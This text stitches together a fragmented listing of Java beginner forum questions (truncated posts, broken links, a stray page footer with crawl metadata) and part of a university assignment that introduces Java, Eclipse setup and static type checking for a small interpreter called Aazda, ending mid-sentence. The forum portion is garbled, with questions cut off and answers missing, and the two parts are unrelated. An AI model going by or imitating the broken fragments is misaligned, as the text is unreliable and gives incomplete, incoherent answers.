What is Java What is Java and how a fresher can learn it fast? Can any one share the fastest learning tips for Java Programming language? Thanks! Hi,Java is one of the most popular programming language. You can learn
background
background how to add image as background to a frame
java programming problem - Java Beginners
/java/java-tips/data/strings/96string_examples/example_count.shtml
http.../java-tips/data/strings/96string_examples/example_countVowels.shtml
follow...java programming problem Hello..could you please tell me how can I
java code - Java Beginners
java code plese provide code for the fallowing task
Write a small record management application for a school. Tasks will be Add Record, Edit...), Age, Notes(No Maximum Limit)
No database should be used. All data must
java - Java Beginners
://
Thanks
RoseIndia Team...java Java always provides default constructor to ac lass is it true... constructor.If we don't create any constructor for a class java itself creates
Lotus notes - Hibernate
Lotus notes In Lotus notes to csv file conversion--> can we use two delimiters?
like
java reminder Application
java reminder Application Create an awt application which imitates a reminder application,that stores notes and specify date and time to be reminded
EJB,java beans
EJB,java beans What is EJB poles,mainfest,jar files?
What is nongraphical bean?
Please send me as notes
java script
java script when you click a button how will you change the background color of a web page
java
java diff bt core java and java
how to improve knowledge in java
how to improve knowledge in java netbeans
Please visit the following link:
java
java what is java
java swings - Java Beginners
java swings Hi,
I need the code for how can i set the joptionpane color(background and foreground).
can i set the delay time for joptionpane display.
Please send the code .its urgent.
Thanks,
Valarmathi project
java project i would like to get an idea of how to do a project by doing a project(hospital management) in java.so could you please provide me with tips,UML,source code,or links of already completed project with documentation
developing skills in java , j2ee - Java Beginners
developing skills in java , j2ee How to understand or to feel the flow of java or j2ee programme what is the way to become a expert programmer can you please give me tips
thanking you
Java - Java Beginners
://... void main(String args[]) {
File f1 = new File("/tmp/java");
File f11
Java programming 1 - Java Beginners
:// programming 1 Thx sir for reply me ^^ err how bout if using scanner class or further method to solve that code? instead of using array?
Advertisements
If you enjoyed this post then why not add us on Google+? Add us to your Circles | http://www.roseindia.net/tutorialhelp/comment/68090 | CC-MAIN-2016-07 | refinedweb | 1,739 | 53 |
Created on 2017-06-15 15:27 by rthr, last changed 2017-06-15 16:06 by rthr.
Here is the example code I am running:
```
import asyncio
class it:
async def __aenter__(self):
return self
async def __aexit__(self, *_):
print('EXIT')
async def main():
async with it():
await asyncio.sleep(100)
asyncio.get_event_loop().run_until_complete(main())
```
When this gets interrupted by a SIGINT, I would expect this code to display `EXIT` before the `KeyboardInterrupt` stacktrace. But instead the `__aexit__` function is simply not called.
Yes, this is a known limitation of asyncio -- keyboardinterrupt exceptions kills the loop rather abruptly. One way to handle this is to use 'signal.signal' for sigint to raise custom exception instead of keyboardinterrupt.
Ok, thank you. I'm guessing the patch I proposed in the PR is not an option, for my curiosity, why is that? | https://bugs.python.org/issue30679 | CC-MAIN-2018-05 | refinedweb | 142 | 65.73 |
Xlsxwriter is a python module through which we can write data to Excel 2007+ XLSX file format. In this blog post we learn to write data, insert images and draw graphs in the excel file.
To write data into excel file first we need to create a file and add a sheet to the file. By default the names of the sheets will be Sheet1, Sheet2 and etc., or we can create sheets with our own names.
import xlsxwriter # Create an new Excel file and add a worksheet. workbook = xlsxwriter.Workbook('test.xlsx') worksheet = workbook.add_worksheet() # Sheet1 worksheet = workbook.add_worksheet(‘WorkLog’) # WorkLog
In the above snippet we are create an excel file with name test.xlsx and add two sheets to the file as ‘Sheet1’ and ‘WorkLog’
Now we can write the data to the excel sheet with in two ways using write(), one way is write(row, column, data) where row is the row number and column is the column number and data is the data that we need to write into the file. Second way is to write the into the cell name directly
worksheet.write(0, 0, ‘MicroPyramid’) worksheet.write(‘A1’, ‘MicroPyramid’)
The above snippet will write the data in the first cell of the sheet. In the similar way we can write data into other cells by finding the row and column numbers.
We can insert image into the excel sheet with insert_image() function. We can also set the height and width of the images in the excel sheet by setting the width and height of the cell where the image is going to be inserted.
worksheet.insert_image('B5', 'logo.png') worksheet.insert_image(2, 4', 'logo.png')
We can also draw charts in the excel sheets. We can draw Bar and line charts in the excel sheet using xlsxwriter module using add_chart() method
chart = workbook.add_chart({'type': 'column'}) # Write some data to add to plot on the chart. data = [ [5, 10, 15, 20, 25], ] worksheet.write_column('A1', data[0]) # Configure the charts. In simplest case we just add some data series. chart.add_series({'values': '=Sheet1!$A$1:$A$5'}) # Insert the chart into the worksheet. worksheet.insert_chart('A7', chart) workbook.close()
Here ‘type’ can be of any thing in ‘bar’ or ‘column’ or anything.
UPDATE: we recently found amonther blog post useful to work on excel with python... | https://micropyramid.com/blog/create-excel-file-in-python-and-insert-image-and-draw-bar-graphs-using-python-xlsxwriter/ | CC-MAIN-2019-51 | refinedweb | 392 | 74.9 |
Evgeny Shvarov 24 January 2018Code snippet, Coding Guidelines, ObjectScript, Caché, InterSystems IRIS?
For one-line if I prefer postconditionals:
As for For - the option with braces. It's more readable. And one line inside For loop quickly and often becomes several lines, so braces become mandatory anyway.
But...
Can one condition in "postconditionals" "quickly and often" convert into several lines?
Maybe postconditionals shoud be If with braces too?
Postconditionals are to be used only for the most simple checks, for example:
instead of
But several conditions (or several lines inside) should be as if, I agree.
for several conditions there's always $S too.
I tend to use "if" rather than postconditionals because it makes the code read more like spoken language, and I think it's easier to understand for those who are not seasoned Caché veterans.
However I make exceptions for "quit" and "continue":
quit:$$$ISERR(tSC)
continue:x'=y
I like to have these out in front, rather than buried in a line somewhere, so that when I'm scanning code I can easily see "this is where the execution will branch if a certain condition is met."
I also like this style, as it helps me spot the lines where execution at the current level might terminate.
Yep, brace always.
Because you will never know if you need to update your condition or chain another. The brace shows what is the scope of the condition, also for loops, for, for each, etc.
It is a good practices and it is more readable.
As Eduard Lebedyuk has commented, a single IF for use to set a variable, the postconditionals is a good idea, coz you know the condition before to set.
Agreed, and if you want to have your cake and eat it, too:
Brace always for me too, unless I am writing some quick debugging code or something along those lines
Agree with brace always. This really helps with new developers as the syntax is something they've seen before in other languages.
Postcondition is preferred
especially
quit:erroror
continue:ignore
for i=1:1:5 write i," "is as fine as
for i=1:1:5 { write i," " } write "end"
but this is really bad:
f i=1:1:5 d w "? "
.w i," "
w "end"
OMG!!! What is that!!!
It seems a KGB spy code !!!
I think they named it M(umps)
Besides all that is mentioned, the If without braces has a side-effect that the If with braces does not have : it affects the system variable $Test.
Not important, only if you use the ELSE (legacy) command...
Indeed... the brace delimits the scope of the operation
Thanks, Danny!
Is there any "non-legacy" case when $test can be useful?
I mean, should we consider using $test in a code as a bad practice?
If you want to check on the result of a LOCK command for example
LOCK +<SOMERESOURCE>:<timeout>
IF $T {do something}
So I wouldn't call it bad practice just yet.
Yes, same here, i also use following code a lot:
Open <some device>:"R":0 Else Write "could not open device" Quit
I always use Else on the same line just after the command that changes $test,
having too much instructions between them creates problems.
Oh right, forgot about that.
I would do it this way to avoid Else:
Open <some device>:"R":0 If '$test { Write "could not open device" Quit }
C'mon, let's stop mentioning old features like argumentless Do and legacy ELSE
There's just no point in doing so.
In the real world, there are lots of programs still using this style, every developer using Caché Object Script should be able to read this and understand the side-effects, pitfalls, even if we recommend to not use it anymore...
totally right!!
there is more old code out than you could / would like to imagine
And Caché is backward compatible for 40 years (since DSM V1)
New developers should not write it. But they need to understand it. Or at least recognize it.
It's pretty similar to reading the bible in original language with no translation.
Danny and Robert, of course I understand what you are saying (we are the same generation!). Also, I am not trying to be the Developer Community police.
In posts that are asking "what's the recommended way to do this?" we should answer that question. There's no point in mentioning old syntax in that context. Saying "don't do this, but you might see it someday" helps the subset of people that might work with old code, but doesn't help and may confuse the people that are working with new code. It doesn't belong.
On the other hand, if there's a post asking "what are some older/confusing syntaxes I might encounter when working with M or ObjectScript?" we should answer that question. We all have examples of that.
I wonder if it would be possible to have a more rigid syntax check (now in Atelier / and switchable)
to enforce all kind of brackets (eg: condition like in JS).
I tried to recommend this while teaching COS myself.
With very limited success as some Dinos ignored it.
Everyday I read legacy code like this, but if we're talking about the ideal (like coding guidelines) we want to avoid these. I agree that every Object Script developer should be able to read this code, but they should also know that there are better modern ways to write this.
I think that part of growing the community of Object Script developers is to lower barriers to entry. Having worked with a lot of new Object Script developers (and been one myself), one of the largest barriers to entry is the prevalence of cryptic legacy syntax in existing code.
Remember, just because we can read it doesn't mean that everyone can.
Argumentless DO is still the simplest way to introduce a scope to NEW a variable, including $namespace or $roles. Yes, you can extract that out to another procedure or method, but I often prefer to do it inline.
Good point Jon. Here's a concrete example, taken from the CheckLinkAccess classmethod of %CSP.Portal.Utils (2017.2 version). I have done the macro expansion myself and highlighted the expansions:
Do
. New $roles
. Set $roles=""
. If ($extract($roles,1,$length("%All"))="%All") Set tHaveAllRole = 1
If tHaveAllRole {
...
Congratulations!
I new I had seen something similar
We want our code to be as accessible and readable as possible to as many people as possible. We always prefer whitespace formatting and curly brackets to arcane one line syntax. Someone who's not an Object Script expert will know what this does -
But there's no guarantee that a novice will necessarily know what these do -
Good code is readable and clever one liners will get in the way of that goal.
"We want our code to be as accessible and readable as possible to as many people as possible. "
Do we? ;)
"We always prefer whitespace formatting and curly brackets to arcane one line syntax." -- I don't ;)
Using arcane one liners shows that you are a superiour wizard. One should always use the short forms of commands to make code more terse and save space. If people want to read the code, they can use 'expand code' in studio (which expands the shortform commands to the full version).
Note, there might be some sarcasm in here.
People who know me, might also know that I'm only maybe 80% joking;)
you remind me the joke about hieroglyphs:
- What's wrong with them?
- Nothing! Priests in old Egypt were reading the "book of death" like you would read a newspaper.
- You just have to learn the 'encryption'.
The legacy versions of If and For commands don't use curly braces. But there are no legacy versions of While and Do/While, which require curly braces. So rather than trying to remember which commands use or don't use curly braces, just use curly braces all the time for these, as well as Try/Catch.
Regarding post-conditionals, it's a good habit to put parentheses around the condition, which allows you to put spaces in the condition.
This is valid syntax: set:a=4 y=10
This is valid syntax and more readable: set:(a = 4) y = 10
This is invalid syntax: set:a = 4 y = 10
I just went through the whole conversation on this and find it knowledgeable for me as i am beginner for cache. Now i am able to understand how to use them in with the standards and where i need to careful thanks for all.
Hi, colleagues!
The sense of the discussion I raised is to get Coding Guidelines for ObjectScript to let us cook the code which suits the goals and team guidelines the best.
Thanks for a lot of bright thoughts and true experience!
If I am modifying a routine I didn't originally write then I tend to stick to the coding style the original author adopted - even it is using legacy syntax. It is good practice not to mix old and new constructs within the same code block ie. don't mix curly braces with line-oriented syntax. If you are completely re-writing something or writing new code then I prefer curly braces.
I would have liked to re-factor some of my code better but I found the 'use for' construct breaks when you try that. In this pseudocode, I was using the 'write' statement to write to a file on the file system. There is a condition that is checked to determine whether it gets written to file1 or file2.
for arrayIndex=1:1:arrayOfIds.Count()
continue:errorStatus'=1
use file1 for testIndex=1:1:testSetObj.TestCollection.Count()
use file2 for testIndex=1:1:testSetObj.TestCollection.Count()
I miss 3 things in this example:
New file. If the specified file does not exist, the system creates the file. If the specified file already exists, the system creates a new one with the same name. The status of the old file depends on which operating system you are using. On UNIX® and Windows, Caché deletes the old file. (Note that file locking should be used to prevent two concurrent processes using this parameter from overwriting the same file.)
So to get all output you may append arrayIndex to filename to have unique file names
Thanks for the comments Robert. It's safe to assume there is an IF statement in each inner-for to determine whether to do anything or not. Each object in arrayOfIds needs to be opened and a Boolean check is done against a property. I haven't had a problem with the 'N' parameter. The code appears to store 'write' records in process memory before writing everything to file after the outer-for. $ZSTORAGE has been buffed to accommodate this.
Unique file names have been achieved using the following assumptions:
1) The process will run no more than once a day
2) Append today's date in ODBC format using $zd(+$h,3) to the end of the filename.
The 'close' statement appears after the outer-for but I'm not sure if the curly braces implicitly does it anyway.
Thanks for the clarification.
It's sometimes hard to guess the picture if you miss some pixels.
I'd still recommend moving the CLOSE after each inner loop to have OPEN / CLOSE strictly paired
The implicit CLOSE happens only if you exit the partition. There's no class to act undercover.
Curly braces just structure the code with no operational side effect.
It's already 256Mb, since 2012.2
Strange. Our production servers are Caché 2018 on AIX but still showing only 16,384 KB.
Must have preserved the existing setting on upgrades rather than use the new value.
Fresh local Caché install on Windows install shows 256MB though.
Cache for UNIX (IBM AIX for System Power System-64) 2018.1.2 (Build 309_5) Wed Jun 12 2019 20:08:03 EDT
%SYS>w $zs
16384
Which part of it?
There's like 5 different suggestions contradicting each other.
None of them. The best practices is "Do what you want"... hehe
Now seriously. I think the best practices is use according to the explication of each comment. Use brace to delimit the scope, not use if you have one line and precondition, etc..
The conversation is helpful.
Ok, this is fair - we can remove the Best Practice tag for this.
The idea was that this is important conversation if you consider internal guidelines on this for your organization and can take one approach from the best practices of experienced developers.
I think it is a "Best practice", but the information is scattered throughout the conversation.
Why not create a last comment with a brief of the conversation, with pros and cons?
It could be more clear.
Regards | https://community.intersystems.com/post/and-if-one-line-brace-or-not-brace | CC-MAIN-2020-05 | refinedweb | 2,166 | 71.85 |
.
modules: config: Db: dsn: 'PDO DSN HERE' user: 'root' password:
Db module can cleanup database between tests by loading a database dump. This can be done by parsing SQL file and executing its commands using current connection
modules: config: Db: dsn: 'PDO DSN HERE' user: 'root' password: dump: tests/_data/your-dump-name.sql cleanup: true # reload dump between tests populate: true # load dump before all tests
Alternatively an external tool (like mysql client, or pg_restore) can be used. This approach is faster and won’t produce parsing errors while loading a dump. Use
populator config option to specify the command. For MySQL it can look like this:
modules: enabled: - Db: dsn: 'mysql:host=localhost;dbname=testdb' user: 'root' password: '' cleanup: true # run populator before each test populate: true # run populator before all test populator: 'mysql -u $user $dbname < tests/_data/dump.sql'
See the Db module reference for more examples.
To ensure database dump is loaded before all tests add
populate: true. To clean current database and reload dump between tests use
cleanup: true..
The Db module provides actions to create and verify data inside a database.
If you want to create a special database record for one test, you can use
haveInDatabase method of
Db module:
<]);
Laravel5 module provides the method
have which uses the factory method to generate models with fake data.
If you want to use ORM for integration testing only, you should enable the framework module with only the
ORM part enabled:
modules: enabled: - Laravel5: - part: ORM
modules: enabled: - Yii2: - part: ORM
This way no web actions will be added to
$I object.):
modules: enabled: - Symfony - Doctrine2: depends: Symfony
modules: enabled: - ZF2 - Doctrine2: depends: ZF2
If no framework is used with Doctrine you should provide the
connection_callback option with a valid callback to a function which returns an
EntityManager instance.
Doctrine2 also provides methods to create and check data:
haveInRepository
grabFromRepository
grabEntities.
What if you deal with data which you don’t own? For instance, the page look depends on number of categories in database, and categories are set by admin user. How would you test that the page is still valid?
There is a way to get it tested as well. Codeception allows you take a snapshot of a data on first run and compare with on next executions. This principle is so general that it can work for testing APIs, items on a web page, etc.
Let’s check that list of categories on a page is the same it was before.
Create a snapshot class:
vendor/bin/codecept g:snapshot Categories
Inject an actor class via constructor and implement
fetchData method which should return a data set from a test.
<?php namespace Snapshot; class Categories extends \Codeception\Snapshot { /** @var \AcceptanceTester */ protected $i; public function __construct(\AcceptanceTester $I) { $this->i = $I; } protected function fetchData() { // fetch texts from all 'a.category' elements on a page return $this->i->grabMultiple('a.category'); } }
Inside a test you can inject the snapshot class and call
assert method on it:
<?php public function testCategoriesAreTheSame(\AcceptanceTester $I, \Snapshot\Categories $snapshot) { $I->amOnPage('/categories'); // if previously saved array of users does not match current set, test will fail // to update data in snapshot run test with --debug flag $snapshot->assert(); }
On the first run, data will be obtained via
fetchData method and saved to
tests/_data directory in json format. On next execution the obtained data will be compared with previously saved snapshot.
To update a snapshot with a new data run tests in
--debugmode.
By default Snapshot uses
assertEquals assertion, however this can be customized by overriding
assertData method.
The assertion performed by
assertData will not display the typical diff output from
assertEquals or any customized failed assertion. To have the diff displayed when running tests, you can call the snapshot method
shouldShowDiffOnFail:
<?php public function testCategoriesAreTheSame(\AcceptanceTester $I, \Snapshot\Categories $snapshot) { $I->amOnPage('/categories'); // I want to see the diff in case the snapshot data changes $snapshot->shouldShowDiffOnFail(); $snapshot->assert(); }
If ever needed, the diff output can also be omitted by calling
shouldShowDiffOnFail(false).
By default, all snapshot files are stored in json format, so if you have to work with different formats, neither the diff output or the snapshot file data will be helpful. To fix this, you can call the snapshot method
shouldSaveAsJson(false) and set the file extension by calling
setSnapshotFileExtension():
<?php public function testCategoriesAreTheSame(\AcceptanceTester $I, \Snapshot\Categories $snapshot) { // I fetch an HTML page $I->amOnPage('/categories.html'); // I want to see the diff in case the snapshot data changes $snapshot->shouldSaveAsJson(false); $snapshot->setSnapshotFileExtension('html'); $snapshot->assert(); }
The snapshot file will be stored without encoding it to json format, and with the
.html extension.
Beware that this option will not perform any changes in the data returned by
fetchData, and store it as it.
© 2011 Michael Bodnarchuk and contributors
Licensed under the MIT License. | https://docs.w3cub.com/codeception/09-data | CC-MAIN-2021-10 | refinedweb | 811 | 51.18 |
Improve your Python with our efficient tips and tricks.
You can Practice tricks using Online Code Editor
Tip and Trick 1: How to measure the time elapsed to execute your code in Python
Let’s say you want to calculate the time taken to complete the execution of your code. Using a time module, You can calculate the time taken to execute your code.
import time startTime = time.time() # write your code or functions calls endTime = time.time() totalTime = endTime - startTime print("Total time required to execute code is= ", totalTime)
Tip and Trick 2: Get the difference between the two Lists
Let’s say you have the following two lists.
list1 = ['Scott', 'Eric', 'Kelly', 'Emma', 'Smith'] list2 = ['Scott', 'Eric', 'Kelly']
If you want to create a third list from the first list which isn’t present in the second list. So you want output like this
list3 = [ 'Emma', 'Smith]
Let see the best way to do this without looping and checking. To get all the differences you have to use the set’s symmetric_difference operation.
list1 = ['Scott', 'Eric', 'Kelly', 'Emma', 'Smith'] list2 = ['Scott', 'Eric', 'Kelly'] set1 = set(list1) set2 = set(list2) list3 = list(set1.symmetric_difference(set2)) print(list3)
Tip and Trick 3: Calculate memory is being used by an object in Python
whenever you use any data structure(such as a list or dictionary or any object) to store values or records.
It is good practice to check how much memory your data structure uses.
Use the
sys.getsizeof function defined in the sys module to get the memory used by built-in objects.
sys.getsizeof(object[, default]) return the size of an object in bytes.
import sys list1 = ['Scott', 'Eric', 'Kelly', 'Emma', 'Smith'] print("size of list = ",sys.getsizeof(list1)) name = 'pynative.com' print("size of name = ",sys.getsizeof(name))
Output:
('size of list = ', 112) ('size of name = ', 49)
Note: The sys.getsizeof doesn’t return the correct value for third-party objects or user defines objects.
Tip and Trick)
Output:
'Original= ', [20, 22, 24, 26, 28, 28, 20, 30, 24] 'After removing duplicate= ', [20, 22, 24, 26, 28, 30]
Tip and Trick 5: Find if all elements in a list are identical
Count the occurrence of a first element. If it is the same as the length of a list then it is clear that all elements are the same.
listOne = [20, 20, 20, 20] print("All element are duplicate in listOne", listOne.count(listOne[0]) == len(listOne)) listTwo = [20, 20, 20, 50] print("All element are duplicate in listTwo", listTwo.count(listTwo[0]) == len(listTwo))
Output:
'All element are duplicate in listOne', True 'All element are duplicate in listTwo', False
Tip and Trick 6: How to efficiently compare two unordered lists
Let say you have two lists that contain the same elements but elements order is different in both the list. For example,
one = [33, 22, 11, 44, 55] two = [22, 11, 44, 55, 33]
The))
Output:
'is two list areb equal', True
Tip and Trick 7: How to check if all elements in a list are unique
Let say you want to check if the list contains all unique elements or not.
def isUnique(item): tempSet = set() return not any(i in tempSet or tempSet.add(i) for i in item) listOne = [123, 345, 456, 23, 567] print("All List elemtnts are Unique ", isUnique(listOne)) listTwo = [123, 345, 567, 23, 567] print("All List elemtnts are Unique ", isUnique(listTwo))
Output:
All List elemtnts are Unique True All List elemtnts are Unique False
Tip and Trick 8: Convert Byte to String
To convert the byte to string we can decode the bytes object to produce a string. You can decode in the charset you want.
byteVar = b"pynative" str = str(byteVar.decode("utf-8")) print("Byte to string is" , str )
Output:
Byte to string is pynative
Tip and Trick 8: Use enumerate
Use enumerate() function when you want to access the list element and also want to keep track of the list items’ indices.
listOne = [123, 345, 456, 23] print("Using enumerate") for index, element in enumerate(listOne): print("Index [", index,"]", "Value", element)
Output:
Using enumerate Index [ 0 ] Value 123 Index [ 1 ] Value 345 Index [ 2 ] Value 456 Index [ 3 ] Value 23
Tip and Trick 9: Merge two dictionaries in a single expression
For example, let say you have the following two dictionaries.
currentEmployee = {1: 'Scott', 2: "Eric", 3:"Kelly"} formerEmployee = {2: 'Eric', 4: "Emma"}
And you want these two dictionaries merged. Let see how to do this.
In Python 3.5 and above:
currentEmployee = {1: 'Scott', 2: "Eric", 3:"Kelly"} formerEmployee = {2: 'Eric', 4: "Emma"} allEmployee = {**currentEmployee, **formerEmployee} print(allEmployee)
In Python 2, or 3.4 and lower
currentEmployee = {1: 'Scott', 2: "Eric", 3:"Kelly"} formerEmployee = {2: 'Eric', 4: "Emma"} def merge_dicts(dictOne, dictTwo): dictThree = dictOne.copy() dictThree.update(dictTwo) return dictThree print(merge_dicts(currentEmployee, formerEmployee))
Tip and Trick 10: Convert two lists into a dictionary
Let say you have two lists, and one list contains keys and the second contains values. Let see how can we convert those two lists into a single dictionary. Using the zip function, we can do this.
ItemId = [54, 65, 76] names = ["Hard Disk", "Laptop", "RAM"] itemDictionary = dict(zip(ItemId, names)) print(itemDictionary)
Tip and Trick 11: Convert hex string, String to int
hexNumber = "0xfde" stringNumber="34" print("Hext toint", int(hexNumber, 0)) print("String to int", int(stringNumber, 0))
Tip and Trick 12: Format a decimal to always show 2 decimal places
Let say you want to display any float number with 2 decimal places. For example 73.4 as 73.40 and 288.5400 as 88.54.
number= 88.2345 print('{0:.2f}'.format(number))
Tip and Trick 13: Return multiple values from a function
def multiplication_Division(num1, num2): return num1*num2, num2/num1 product, division = multiplication_Division(10, 20) print("Product", product, "Division", division)
Tip and Trick 14: The efficient way to check if a value exists in a NumPy array
This solution is handy when you have a sizeable NumPy array.
import numpy arraySample = numpy.array([[1, 2], [3, 4], [4, 6], [7, 8]]) if value in arraySample[:, col_num]: print(value) | https://pynative.com/useful-python-tips-and-tricks-every-programmer-should-know/ | CC-MAIN-2021-39 | refinedweb | 1,024 | 60.24 |
When someone wishes to activate a Bonobo component, they go and query the Object Activation Framework (Oaf). Consequently the first thing we must do is make sure that Oaf knows enough about the control we are about to implement.
To do this, we need to install a small XML file in a path where Oaf expects to find it. This might be in
/usr/share/oaf, depending on your prefix, and
GNOME_PATH. A cut-down Oaf file
might look like this:
A sample Oaf file
Bonobo components are created by factories; consequently we have two server definitions. The factory, which is of type "exe" and located in the executable
bonobo-sample-controls, is called
Bonobo_Sample_ControlFactory. The object itself, named
Bonobo_Sample_Clock, is created by a factory, of name
Bonobo_Sample_ControlFactory.
In addition, it's important to notice that the interfaces supported by the component are declared against the control. In this case,
only two interfaces are declared:
Bonobo/Unknown and
Bonobo/Control. And finally, the component is described to allow GUI builders such as Glade to display information about the control.
This example is taken from
bonobo/samples/controls.
In many situations, it should not be necessary to implement new interfaces. Instead, generic Bonobo interfaces such as the
PropertyBag and
EventSource/Listener interfaces should be used. However, in some situations these will not suffice, and a new interface must be implemented.
First, the interface must be declared in Interface Definition Language (IDL), (see
bonobo/idl for some examples). For instance,
GNOME_Foo.idl.
Declaring the interface
Note that the Java naming convention is used in method naming. Also note that namespace allocation and naming is important, see bonobo/doc/FAQ.
Having implemented this we must compile it:
Compiling the interface
This will build
GNOME_Foo-stubs.c,
GNOME_Foo-skels.c, and
GNOME_Foo-common.c, which provide stub (client access code), skels (server implementation code) and
common code for the CORBA transport. These must be linked into your application.
Creating a simple control
Since the creation of controls is an operation that is very commonly required, Bonobo has some helpful implementation details that make it possible to do this easily, in fact, in a single line.
Assuming your control is already a GtkWidget, one can simply make a control out of it thus (showing the full control factory function):
Making your GtkWidget into a control
It is important to show the widget before returning it as a control. Many people use
gtk_widget_show_all to reveal their entire widget hierarchy. This, however, is bad practice as it will not propagate to a sub-control, since a control might (legitimately) want to conceal parts of its contents.
Thus it is extremely easy to create and expose a GtkWidget as a control. A great example of setting up a simple control, and adding some Bonobo properties to it, can be found in
bonobo/samples/controls/bonobo-clock-control.
Implementing an interface
Now that we have declared this abstract interface, we want to implement the interface inside our clock control. To do this, we use
BonoboXObject, which will seem familiar to anyone confident with the Gtk+ object system upon which it is based. To people used to languages like C++ with built-in OO support, this will seem pedestrian; in such languages there is no need for this boilerplate code.
Implementing the interface with BonoboXObject
Note that the Gtk+ object system implements single "structure" inheritance by having the first element of the derived structure be that of the parent type. Secondly note that the
epv element is constructed by prepending
POA_ and appending
__epv to the full name of the interface, for example
GNOME_Foo.
The
epv is the "Entry Point Vector," this is used by the ORB to locate the implementations of the methods. The
epv contains a set of function pointers to our implementation, which we will fill in later.
Implementing the interface (continued)
This sets up all the necessary interface class information, with some dummy method implementations.
Then -- if only this interface was required -- one might register a boilerplate factory function, thus:
Registering your component
After registering the
GNOME_Foo_Factory with Oaf by adapting the first section, one could write a small client:
A very simple client
See also Basic Bonobo use for more information on the client code.
It's important to note that while on the server side it is possible to get a "Foo *" pointer to the implementation, on the client side you can only get a
GNOME_Foo handle to the remote CORBA object.
bonobo/samples/bonobo-class is a good place to find a complete example of implementing an interface.
Constructing the aggregate object
In many cases, a component will support multiple interfaces. For example we may wish to add the "GNOME/Foo" functionality described
above to the existing
Bonobo_Sample_Clock component. To do this, we must aggregate the interfaces together: This allows either interface to be accessed from the remote client by use of the Query Interface (QI) mechanism (see also Basic Bonobo use).
So, for example:
Aggregating interfaces
The crucial invocation here is
bonobo_object_add_interface. This fuses the two interfaces'
objects together so that they represent a single object, allowing a remote QI to obtain a clock interface from a foo interface and vv.
One of the most useful roles of Bonobo controls is handling data of a certain MIME type. To do this, the control must implement either the
Persist/Stream interface, or the
Persist/File interface. Whilst retrofitting an existing application with the
PersistFile interface is extremely easy, it is in many ways preferable to use the
PersistStream interface.
In addition to implementing the
Bonobo/PersistStream interface, it is necessary to register two things. First, register that the component implements the interface, and second, register the MIME types the component can handle. To do this, we would update the interfaces supported by the component in the Oaf XML file thus:
Registering the component's interfaces
Then we would add a section describing the supported MIME types thus:
Registering the component's supported MIME types
This information enables the system to launch the new control in many situations. For instance, on resolving the moniker:
the system would recognize that this component implements the necessary functionality. The system would then activate it and feed it the stream to allow display of the document.
And finally, here are some key points to take from this final installment of a three-part introduction to Bonobo:
- Implementing Bonobo controls is only marginally more complex than using them.
- Exposing your application as a Bonobo control allows its use across the system in many (sometimes unexpected) contexts.
- Implementing your own interfaces is required infrequently.
- Take a look at the first two articles in this series, Bonobo & ORBit and Basic Bonobo use.
- Also see Bridging XPCOM and Bonobo (techniques), a dW-exclusive tutorial.
- Visit the home of GNOME at.
- GNOME is the desktop environment of the GNU project.
- You'll find the full GNOME 1.0 API documentation at the GNOME developer site.
- Full Bonobo API Reference Manual.
- Help the Bonobos -- inform yourself at.
- Visit Ximian, Inc at.
-. | http://www.ibm.com/developerworks/library/co-bnbo3.html | crawl-002 | refinedweb | 1,177 | 53.51 |
For this assignment, you should work alone, although you should feel free to discuss the problems with other students in the class..
The main purpose of this assignment is to give students enough experience programming in Java to be well prepared to take cs2110 in the Spring. Part 1 (due Tuesday, 22 November) introduces Java with some exercises and then asks you to extend the interpreter to support mutation. Part 2 (due Monday, 5 December) extends the interpreter to include manifest types and static type checking. In addition to providing experience with Java and more experience with interpreters, this assignment should give you a good understanding of how static type checking works and why it is useful.
The most important difference between Java and Python (or Scheme) is that Java uses static type checking. All of the language features we have seen so far were designed to increase the expressiveness of a language: although the small initial subset of Scheme we saw in Class 2 is sufficient to express every possible program, adding lists, begin, let, and mutation, to the language makes it easier to express certain programs concisely. Static type checking serves the opposite purpose: it makes a language less expressive.
There are two reasons we might want to reduce the expressiveness of a programming language. The first one is that sometimes it can make the language implementation simpler and more efficient. For example, the memoizing Charme from Problem Set 7 could only be done because Charme did not provide support for mutation and any side effects. Otherwise, it would not be safe to assume the result of applying the same function to the same inputs will always produce the same output.
The other reason for reducing expressiveness is that it can contribute to the goal of preventing programmers from expressing programs that will crash or produce unexpected results when they are executed. Such languages sacrifice expressiveness for the sake of truthiness — increasing the likelihood that a program means what its programmer intends.
A high level of truthiness is important when software is used to control a physical device whose correct and continued function is essential to safety such as software controlling a nuclear power plant (note, however, that Java's license agreement disallows its use for this purpose!), anti-lock brakes, or aircraft avionics. In such cases, it is much better to reduce the expressiveness of your programming language and get more errors when the software is developed, than to get unexpected behaviors when the software is running.
For this assignment, you will modify a provided Java implementation of an interpreter for a language similar to Charme from Problem Set 7 to provide static type checking. The new language is called Aazda, after a kind of Python found on the island of Java.
The tool we will use to create Java programs is the Eclipse Integrated Development Environment (IDE). Eclipse is similar to DrRacket (for Scheme) and IDLE (Python). It provides an editor for editing Java code. Unlike, Scheme and Python, though, the Java programming language is implemented using a compiler, not an interpreter. This means instead of being able to directly evaluate expressions in an interactions window, we need to first compile our program into an executable, and then run that executable.
Eclipse is a huge and extensible platform, with support for lots of different languages and tools. This makes it difficult to get started with, but once you get used to it, it is a powerful development environment.
Download the Eclipse IDE for Java Developers. It is available for Mac OS X, Windows, and Linux (as well as source code to build for other platforms). The download is a zip file containing an eclipse directory. There is nothing to "install", just extract this directory to wherever you want (for example, your Program Files directory in Windows). The program eclipse.exe (Windows) in this directory is the main Eclipse executable. Double-click on the eclipse logo
to start running Eclipse.
The first time you run Eclipse, it will ask you to select a workspace. Create a new directory in your cs1120 directory, and select this as your workspace. (If you check the Use this as the default box, it won't ask you again.) Then, you'll see a welcome screen. It includes Samples and Tutorials, or you can click "Workbench" (the arrow icon) to get started right away.
To start a new project, select File | New | Java Project. Enter the name of the project and select Finish (you probably don't need to change any of the other options).
For the first part of this assignment, you will create a new Java Project in Eclipse and get familiar with Java and Eclipse by making and running a simple Java program. This part of the assignment is not directly related to the second part of the assignment where you modify the Aazda interpreter.
Create a new project in Eclipse by selecting File | New | Java Project. Enter Warmup for the project name, and click Finish.
Then, select File | New | Class to create a class for your project. All code in a Java program must be defined in a class. In the Class dialog, enter warmup for the Package name and Warmup for the class name, and check the box for "Which method stubs would you like to create?" for public static void main(String[] arg). Click Finish to create the class.
You should now see a file Warmup.java in your editor window:
The main method which was created as a stub is the method that will be called when the program is executed. So, you can experiment with Java by adding code to the main method. The declaration includes:The main method which was created as a stub is the method that will be called when the program is executed. So, you can experiment with Java by adding code to the main method. The declaration includes:package warmup; public class Warmup { /** * @param args */ public static void main(String[] args) { // TODO Auto-generated method stub } }
